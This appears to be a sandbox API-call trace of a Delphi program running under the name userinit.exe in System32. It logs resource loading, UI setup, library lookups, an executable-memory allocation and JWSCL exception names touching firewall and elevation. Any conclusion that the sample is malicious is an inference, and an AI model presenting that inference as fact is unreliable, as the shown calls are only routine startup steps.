[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff1a, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff19, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff18, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff17, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff16, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff15, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff14, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff13, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0189.637] LoadStringA (in: hInstance=0x2940000, uID=0xff12, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0189.637] LoadStringA (in: hInstance=0x2940000, uID=0xff11, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0189.637] LoadStringA (in: hInstance=0x2940000, uID=0xff10, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0189.637] LoadStringA (in: hInstance=0x2940000, uID=0xff2f, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0189.637] LoadStringA (in: hInstance=0x2940000, uID=0xff2e, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0189.637] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0189.637] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0189.637] GetVersion () returned 0x1db10106
[0189.637] GetCurrentProcessId () returned 0x2a8
[0189.637] GlobalAddAtomA (lpString="Delphi000002A8") returned 0xc0fb
[0189.637] GetCurrentThreadId () returned 0x5a8
[0189.637] GlobalAddAtomA (lpString="ControlOfs02940000000005A8") returned 0xc0f4
[0189.637] RegisterClipboardFormatA (lpszFormat="ControlOfs02940000000005A8") returned 0xc188
[0189.637] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0189.637] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0189.637] GetSystemMetrics (nIndex=19) returned 1
[0189.637] GetSystemMetrics (nIndex=75) returned 1
[0189.637] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a61320, fWinIni=0x0 | out: pvParam=0x2a61320) returned 1
[0189.637] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0189.637] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0189.637] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ff9) returned 0x1101a7
[0189.638] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0189.638] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0189.638] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0189.638] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffa) returned 0x11019d
[0189.638] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffb) returned 0xe0145
[0189.638] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffc) returned 0x130135
[0189.638] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffd) returned 0x8011f
[0189.638] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7fff) returned 0x1b0105
[0189.639] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffe) returned 0x1401bd
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0189.639] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0189.639] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0189.639] GetDC (hWnd=0x0) returned 0x68010872
[0189.639] GetDeviceCaps (hdc=0x68010872, index=90) returned 96
[0189.639] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0189.639] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0189.639] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2999a60, dwData=0x2a6156c) returned 1
[0189.639] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x12f47b, fWinIni=0x0 | out: pvParam=0x12f47b) returned 1
[0189.640] CreateFontIndirectA (lplf=0x12f47b) returned 0x250a0884
[0189.640] GetObjectA (in: h=0x250a0884, c=60, pv=0x12f26c | out: pv=0x12f26c) returned 60
[0189.640] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x12f327, fWinIni=0x0 | out: pvParam=0x12f327) returned 1
[0189.640] CreateFontIndirectA (lplf=0x12f403) returned 0xfa0a0836
[0189.640] GetObjectA (in: h=0xfa0a0836, c=60, pv=0x12f26c | out: pv=0x12f26c) returned 60
[0189.640] CreateFontIndirectA (lplf=0x12f3c7) returned 0x720a0852
[0189.640] GetObjectA (in: h=0x720a0852, c=60, pv=0x12f26c | out: pv=0x12f26c) returned 60
[0189.640] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0189.640] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f3db, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.640] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x12f3db | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0189.641] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x150000
[0189.641] GetKeyboardLayoutList (in: nBuff=64, lpList=0x12f35c | out: lpList=0x12f35c) returned 1
[0189.642] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0189.642] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0189.642] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0189.643] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0189.644] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0189.644] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0189.644] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0189.644] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0189.644] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0189.644] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0189.644] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0189.644] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0189.644] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0189.644] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0189.644] LoadStringA (in: hInstance=0x2940000, uID=0xff59, lpBuffer=0x12f0bc, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0189.644] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0189.644] LoadStringA (in: hInstance=0x2940000, uID=0xff5a, lpBuffer=0x12f0bc, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0189.644] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0189.644] LoadStringA (in: hInstance=0x2940000, uID=0xff5b, lpBuffer=0x12f0bc, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0189.644] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0189.644] LoadStringA (in: hInstance=0x2940000, uID=0xff5c, lpBuffer=0x12f0bc, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0189.644] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0189.644] SetErrorMode (uMode=0x8000) returned 0x1
[0189.645] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d820000
[0189.647] SetErrorMode (uMode=0x1) returned 0x8000
[0189.647] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreatePropertyFrame") returned 0x6d8220ea
[0189.647] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreateFontIndirect") returned 0x6d8220b7
[0189.647] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreatePictureIndirect") returned 0x6d8220c8
[0189.647] GetProcAddress (hModule=0x6d820000, lpProcName="OleLoadPicture") returned 0x6d8220d9
[0189.647] SysReAllocStringLen (in: pbstr=0x2a2fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a2fa98*="EJwsclUnsupportedException") returned 1
[0189.647] SysReAllocStringLen (in: pbstr=0x2a2fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a2fa80*="EJwsclPIDException") returned 1
[0189.647] SysReAllocStringLen (in: pbstr=0x2a2fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a2fa68*="EJwsclJwShellExecuteException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a2fa50*="EJwsclShellExecuteException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a2fa38*="EJwsclElevationException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a2fa20*="EJwsclAbortException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a2fa08*="EJwsclSuRunErrorException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a2f9f0*="EJwsclElevateProcessException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a2f9d8*="EJwsclCertApiException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a2f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a2f9a8*="EJwsclInvalidStartupInfo") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a2f990*="EJwsclFirewallNoExceptionsException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a2f978*="EJwsclFirewallInactiveException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a2f960*="EJwsclFirewallDelRuleException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a2f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a2f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a2f918*="EJwsclFirewallAddRuleException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a2f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a2f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a2f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a2f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a2f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a2f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a2f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a2f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a2f840*="EJwsclGetFWStateException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a2f828*="EJwsclSetFWStateException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a2f810*="EJwsclFirewallProfileInitException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a2f7f8*="EJwsclFirewallInitException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a2f7e0*="EJwsclGenericFirewallException") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a2f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a2f7b0*="EJwsclInvalidRegistryPath") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a2f798*="EJwsclEndOfStream") returned 1
[0189.648] SysReAllocStringLen (in: pbstr=0x2a2f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a2f780*="EJwsclClassTypeMismatch") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a2f768*="EJwsclInvalidHandle") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a2f750*="EJwsclInvalidIndex") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a2f738*="EJwsclInvalidSession") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a2f720*="EJwsclMissingEvent") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a2f708*="EJwsclInvalidPointerType") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a2f6f0*="EJwsclCreateProcessFailed") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a2f6d8*="EJwsclNilPointer") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a2f6c0*="EJwsclUnimplemented") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a2f6a8*="EJwsclInitWellKnownException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a2f690*="EJwsclKeyApiException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a2f678*="EJwsclKeyException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a2f660*="EJwsclHashApiException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a2f648*="EJwsclHashException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a2f630*="EJwsclCSPApiException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a2f618*="EJwsclCSPException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a2f600*="EJwsclTerminalSessionException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a2f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a2f5d0*="EJwsclTerminalServiceException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a2f5b8*="EJwsclTerminalServerConnectException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a2f5a0*="EJwsclTerminalServerException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a2f588*="EJwsclCryptUnsupportedException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a2f570*="EJwsclCryptApiException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a2f558*="EJwsclCryptException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a2f540*="EJwsclOSError") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a2f528*="EJwsclResourceInitFailed") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a2f510*="EJwsclResourceUnequalCount") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a2f4f8*="EJwsclResourceNotFound") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a2f4e0*="EJwsclResourceException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a2f4c8*="EJwsclFailedAddACE") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a2f4b0*="EJwsclUnsupportedACE") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a2f498*="EJwsclOpenWindowStationException") returned 1
[0189.649] SysReAllocStringLen (in: pbstr=0x2a2f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a2f480*="EJwsclWindowStationException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a2f468*="EJwsclCloseDesktopException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a2f450*="EJwsclCreateDesktopException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a2f438*="EJwsclOpenDesktopException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a2f420*="EJwsclDesktopException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a2f408*="EJwsclSACLAccessDenied") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a2f3f0*="EJwsclAccessDenied") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a2f3d8*="EJwsclLSAException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a2f3c0*="ESetOwnerException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a2f3a8*="ESetSecurityException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a2f390*="EJwsclInvalidParentDescriptor") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a2f378*="EJwsclInvalidKeyPath") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a2f360*="EJwsclInvalidGenericAccessMask") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a2f348*="EJwsclAdaptSecurityInfoException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a2f330*="EJwsclThreadException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a2f318*="EJwsclInvalidObjectException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a2f300*="EJwsclSecurityObjectException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a2f2e8*="EJwsclHashMismatch") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a2f2d0*="EJwsclStreamHashException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a2f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a2f2a0*="EJwsclStreamSizeException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a2f288*="EJwsclStreamException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a2f270*="EJwsclNoSuchLogonSession") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a2f258*="EJwsclInvalidFlagsException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a2f240*="EJwsclProcessNotFound") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a2f228*="EJwsclInvalidParameterException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a2f210*="EJwsclInvalidPathException") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a2f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0189.650] SysReAllocStringLen (in: pbstr=0x2a2f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a2f1e0*="EJwsclInvalidRevision") returned 1
